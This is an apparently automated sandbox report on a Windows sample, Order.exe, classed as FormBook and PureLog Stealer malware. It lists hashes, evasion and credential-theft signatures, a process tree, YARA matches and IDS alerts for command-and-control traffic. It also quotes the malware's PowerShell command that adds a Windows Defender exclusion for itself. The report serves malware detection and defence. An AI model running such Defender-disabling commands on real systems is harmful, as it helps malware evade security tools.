
Windows Analysis Report
Order.exe

Overview

General Information

Sample name: Order.exe
Analysis ID: 1540817
MD5: 879bfdca45455cfe5b122b8ad287b393
SHA1: a348b566aec66df4baa69cfa826d62707c871a4f
SHA256: 02253d28e37b943a2d0dbbb8e3a1b53f61d63016e6e12c2ba7f5eb2d5da348b8
Tags: exe, user-threatcat_ch

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Order.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 879BFDCA45455CFE5B122B8AD287B393)
    • powershell.exe (PID: 4488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2720 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Order.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 879BFDCA45455CFE5B122B8AD287B393)
    • Order.exe (PID: 4544 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 879BFDCA45455CFE5B122B8AD287B393)
      • mkvfHfXifKJWp.exe (PID: 3616 cmdline: "C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mshta.exe (PID: 4340 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • mkvfHfXifKJWp.exe (PID: 1376 cmdline: "C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7100 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(table has 14 entries; remaining rows not shown)

Source | Rule | Description | Author | Strings
0.2.Order.exe.5130000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.Order.exe.3a6a628.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.Order.exe.5130000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.Order.exe.3a55808.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.2.Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(table has 5 entries; remaining rows not shown)

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order.exe", ParentImage: C:\Users\user\Desktop\Order.exe, ParentProcessId: 6468, ParentProcessName: Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", ProcessId: 4488, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order.exe", ParentImage: C:\Users\user\Desktop\Order.exe, ParentProcessId: 6468, ParentProcessName: Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", ProcessId: 4488, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order.exe", ParentImage: C:\Users\user\Desktop\Order.exe, ParentProcessId: 6468, ParentProcessName: Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", ProcessId: 4488, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T08:01:36.389283+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 35.156.117.131 | 80 | TCP
2024-10-24T08:02:00.059415+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:21.866748+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49851 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:36.136007+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49922 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:50.391000+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49994 | 162.213.249.216 | 80 | TCP
2024-10-24T08:03:04.071658+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 217.160.0.231 | 80 | TCP
2024-10-24T08:03:19.276704+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:33.752288+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:55.854839+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 156.226.22.233 | 80 | TCP
2024-10-24T08:04:09.616741+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50043 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:23.950321+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:37.964229+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50051 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:51.399211+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50055 | 172.81.61.224 | 80 | TCP
2024-10-24T08:05:04.938835+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50059 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T08:01:53.136123+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | TCP
2024-10-24T08:01:54.800687+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 3.33.130.190 | 80 | TCP
2024-10-24T08:01:57.357112+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:14.222615+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49808 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:16.748286+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49824 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:19.405720+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49840 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:28.495447+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49881 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:31.026603+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49893 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:33.589134+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49909 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:42.042625+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49956 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:44.605479+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49967 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:47.847054+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49978 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:56.397433+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 217.160.0.231 | 80 | TCP
2024-10-24T08:02:58.870386+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 217.160.0.231 | 80 | TCP
2024-10-24T08:03:01.433060+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 217.160.0.231 | 80 | TCP
2024-10-24T08:03:10.911969+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:13.448531+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:16.745453+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:25.997357+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:27.648222+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:31.365939+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:48.262622+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50036 | 156.226.22.233 | 80 | TCP
2024-10-24T08:03:50.762469+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 156.226.22.233 | 80 | TCP
2024-10-24T08:03:53.453728+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 156.226.22.233 | 80 | TCP
2024-10-24T08:04:01.903301+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50040 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:04.442206+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50041 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:07.013442+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50042 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:15.293628+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:18.730659+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50045 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:21.276828+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50046 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:30.292422+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50048 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:32.886050+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50049 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:35.417323+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50050 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:43.597788+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50052 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:46.153041+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50053 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:48.861760+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50054 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:57.080718+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50056 | 3.33.130.190 | 80 | TCP
2024-10-24T08:05:00.514602+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50057 | 3.33.130.190 | 80 | TCP
2024-10-24T08:05:02.190581+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50058 | 3.33.130.190 | 80 | TCP


AV Detection

Source: Order.exe, ReversingLabs: Detection: 65%
Source: Order.exe, Virustotal: Detection: 49%
Source: Yara match, File source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Order.exe, Joe Sandbox ML: detected
Source: Order.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Order.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshta.pdbGCTL source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mkvfHfXifKJWp.exe, 00000007.00000000.1815210984.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000000.1972533286.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: qwhy.pdb source: Order.exe
Source: Binary string: qwhy.pdbSHA256 source: Order.exe
Source: Binary string: mshta.pdb source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\mshta.exe, Code function: 9_2_00B9C6D0 FindFirstFileW,FindNextFileW,FindClose, 9_2_00B9C6D0
Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then xor eax, eax 9_2_00B89BB0
Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then mov ebx, 00000004h 9_2_037604E8

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49824 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 35.156.117.131:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49893 -> 206.119.82.134:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49851 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49881 -> 206.119.82.134:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49840 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49922 -> 206.119.82.134:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49956 -> 162.213.249.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 206.119.82.134:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49978 -> 162.213.249.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 162.213.249.216:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49752 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 172.81.61.224:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 156.226.22.233:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 217.160.0.231:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 52.20.84.62:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 172.81.61.224:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 217.160.0.231:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 172.81.61.224:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 52.20.84.62:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 156.226.22.233:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 142.250.186.83:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 217.160.0.231:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 142.250.186.83:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 142.250.186.83:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49994 -> 162.213.249.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 142.250.186.83:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 52.20.84.62:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 52.20.84.62:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 156.226.22.233:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 156.226.22.233:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 172.81.61.224:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 217.160.0.231:80
